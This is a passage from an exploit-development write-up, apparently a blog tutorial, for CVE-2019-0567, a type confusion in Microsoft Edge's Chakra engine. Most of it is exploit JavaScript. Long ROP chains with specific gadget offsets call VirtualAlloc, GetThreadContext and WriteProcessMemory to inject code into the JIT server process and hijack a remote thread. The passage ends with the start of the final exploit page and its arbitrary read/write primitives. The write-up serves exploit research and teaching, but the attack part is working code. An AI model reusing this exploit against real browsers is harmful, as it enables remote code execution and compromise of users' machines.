write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
next();

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// Locate store CONTEXT.Rsp and store it in .data of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);		// 0x1804c37c5: mov rax, qword [rcx] ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118, kernelbaseHigh); // .data section of kernelbase.dll where we want to store CONTEXT.Rsp
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Update CONTEXT.Rip to point to a ret gadget directly instead of relying on CreateRemoteThread start routine (which CFG checks)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f72a, chakraHigh);      // 0x18026f72a: add rax, 0x60 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // ret gadget we want to overwrite our remote thread's RIP with 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xfeab, chakraHigh);        // 0x18000feab: mov qword [rax], rcx ; ret  (Context.Rip = ret_gadget)
next();

// WriteProcessMemory() ROP chain (Number 4)
// Stage 9 -> Write our ROP chain to the remote process, using the JIT handle and the leaked stack via GetThreadContext()

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000100, 0x00000000);             // SIZE_T nSize (0x100) (CONTEXT.Rsp is writable and a "full" stack, so 0x100 is more than enough)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a118-0x08, kernelbaseHigh);      // .data section of kernelbase.dll where CONTEXT.Rsp resides
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret (Pointer to CONTEXT.Rsp)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26ef31, chakraHigh);      // 0x18026ef31: mov rax, qword [rax] ; ret (get CONTEXT.Rsp)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x435f21, chakraHigh);      // 0x180435f21: mov rdx, rax ; mov rax, rdx ; add rsp, 0x28 ; ret (RAX and RDX now both have CONTEXT.Rsp)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPCVOID lpBuffer (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropBegin, chakraHigh);      // .data section of chakra.dll where our ROP chain is
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds the full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it  

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x20)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Setting a jmp rax breakpoint, and then after stepping through the CONTEXT.Rip update and CONTEXT.Rsp saving gadgets, we can start executing our WriteProcessMemory ROP chain.

As we can see, we set nSize to 0x100. We are attempting to copy our ROP chain into the JIT process, and our ROP chain is much smaller than 0x100. However, instead of calculating the size, we simply can just use 0x100 bytes as we have a full stack to work with in the remote process and it is writable. After setting the size, our call is in the following state:

WriteProcessMemory(
	-
	-
	-
	sizeof(rop_chain)			// Size of our ROP chain
	-
);

The next parameter we will fix is lpBaseAddress, which will be where we want to write the ROP chain. In this case, it is the stack location, which we can leak from our preserved CONTEXT.Rsp address.

Using the same “trick” as before, our mov rdx, [rdx+0x8] gadget is circumvented by simply subtracting 0x8 before had the value we want to place in RDX. From here, we can clearly see we have extracted what CONTEXT.Rsp pointed to - and that is the stack within the JIT process.

Our call is in the following state:

WriteProcessMemory(
	-
	addressof(CONTEXT.Rsp),			// Address of our remote thread's stack
	-
	sizeof(rop_chain)			// Size of our ROP chain
	-
);

Next up is the lpBuffer parameter. This parameter is very straight forward, as we can simply just pop the address of the .data section of chakra.dll where our ROP chain was placed.

Our call is now in the below state:

WriteProcessMemory(
	-
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	-
);

The next (and last register-placed parameter) is our HANDLE.

We now have our call almost completed:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	-
);

Lastly, all we need to do is set a NULL value of RSP + 0x28 and set RAX to WriteProcessMemory. The full call can be seen below:

WriteProcessMemory(
	fulljitHandle, 					// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	addressof(CONTEXT.Rsp),				// Address of our remote thread's stack
	addressof(data_chakra_shellcode_location),	// Address of our VirtualProtect ROP chain in the content process (.data of chakra) (what we want to write (our ROP chain))
	sizeof(rop_chain)				// Size of our ROP chain
	NULL 						// Optional
);

We can then attach another WinDbg session to the JIT process and examine the write operation.

As we can see, we have remotely placed our ROP chain to RSP! All we have to do now is update our thread’s RIP member via SetThreadContext and then resume the thread to kick off execution!

SetThreadContext and ResumeThread ROP Chain

All that is left now is to set the thread’s CONTEXT and resume the thread. Here is how this looks:

SetThreadContext(
	threadHandle,				// A handle to the thread we want to set (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)		// The updated CONTEXT structure
);
ResumeThread(
	threadHandle,				// A handle to the thread we want to resume (our thread we created via CreateRemoteThread)
);

Here is our final exploit:

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire away
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

